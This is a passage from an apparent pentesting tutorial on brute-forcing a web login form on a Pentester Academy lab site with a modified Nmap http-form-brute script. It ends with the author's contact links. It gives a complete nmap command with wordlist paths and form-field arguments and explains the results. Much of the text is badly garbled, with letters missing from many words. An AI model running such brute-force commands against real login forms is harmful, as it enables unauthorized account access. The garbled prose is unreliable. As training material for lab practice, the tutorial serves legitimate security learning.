do a dns scan and hence stands same for –no-dns.

5. The -p sith etios the pot to e saed. I ated to sa pot 8 hih is a

speifi taget pot hih sees the e appliatio ad is ope. “o a –p80 will be

sufficient for the NSE script to go ahead and bruteforce that port and none else. I could

speif othe pots ia -p 8 ad oe.

6. As usual with Nmap, before everything else, the attacker must specify the target host if

not the whole URI. That is in this case before writing everything, mention the target host

pentesteracademylab.appspot.com fo Nap to stat, the the pot, the the o-dns

etioale ad the the sipt oe eeds to use hih i this ase is http-form-

ute ad the the sipt aguets.

7. Last but not the least, the attacker also for the convenience specifies the –vvv switch at

the last hih stads fo eta eosit. “igle ould had ee less eose,

ould e less eose opaed to , ad hee I speified he aiu leel of

verbosity which we can attain to go through the results while Nmap would be already

bruteforcing.




Tiggeig the Nap ith the afted ue fo the odified http-form-ute. I hae

mentioned which needed attention to go ahead and craft the query. After everything has been

clear, I go ahead and craft this following query for our modified version of the Nmap NSE script:

nmap pentesteracademylab.appspot.com -n -p80 --script=http-form-brute --script-args='http-

form-brute.path="/lab/webapp/1", http-form-brute.hostname="pentesteracademylab.appspot.com", http-form-brute.method="GET",

passdb="/root/Desktop/pentesteracademy/challenge1/passwords.txt",

userdb="/root/Desktop/pentesteracademy/challenge1/users.txt", http-form-

brute.passvar=password, http-form-brute.uservar=email' –vvv

The crafted query is simple unless one looks at its length. The Nmap takes the target host as

petesteaade.appspot.o ad ith a - sith I speified that e eed ot e-do dns

queries and hence no-dns follows; next I mention the target pot hih is 8 ad the I

etio the —script=http-form-ute hih is the odified sipt ude

/us/shae/ap/sipts/ dieto. I the etio the —script-ags= poig the sipt the

arguments which are required for the target separated by a comma and enclosed in singlequotes as discussed above. The values of these arguments are enclosed in double quotes. And I

then specify a verbose result while Nmap would be running, this is optional and is not required. I

however like to maintain the dignity of the results for a quicker look during a penetration test.

Everything would look like the following:

The oigial ue is attahed aoe. If ou eedt udestad hat its doig, I suggest

eadig this setio agai ad agai. Its ette than copying the query and pasting it over the

terminal for results. That would hamper everything which is being documented here. Apart from

it, when Nmap finishes, the results would be like the following:

1. It will go ahead and target the specified port.

2. It will load the Nmap script specified.

3. It will attempt to recognize the specified URI which the script mentions.

4. The usernames will be taken from userdb.

5.

The passwords will be taken from pasdb.

6. The fo aiales ill e take fo usea fo useae

7. The fo aiales ill e take fo passa fo passod

8. It ill adjust the edpoits ad GET ill e used to utefoe these edpoits.

9. Optionally one could also store the results in xml format.




The utefoe ill e takig tie sie its utefoe:

Depending on the network, it would take time to bring the results back, the results are varied

and hence may require trial and error. This happens due to packets being send either too low or

due to the time lags. False positives are common using the modified script.




As the audience sees the result, these are false positives which were caught in hook by the

modified Lua script, with some trial and error; one should be able to get the right credentials. As

this is getting documented here, Nmap developers are working on the current Lua script for

better detection. With a speed connection, the false positives are however minimized. This

happens due to the TCP packets being sent at low rate and therefore the response from the

web-server getting alfoed. Its due to etok ottleeks.

That marks the conclusion of this document and I hope the audience gets the vision how to

carry out different attacks via the same attack vector but with different approaches. The point

of this document is not to show how things are exploited and you get credentials; that could be

done either way. But the point is to show how many ways a pentester could go ahead and break

the web application to suit his/her objectives. This is a series of documents to follow.




Contact Information

LinkedIn: Contact me on LinkedIn here.

Facebook: Contact me on Facebook here.

Reach me at: [email protected]

https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile



https://www.facebook.com/coded32









1. web-form brute force methods-libre

Documents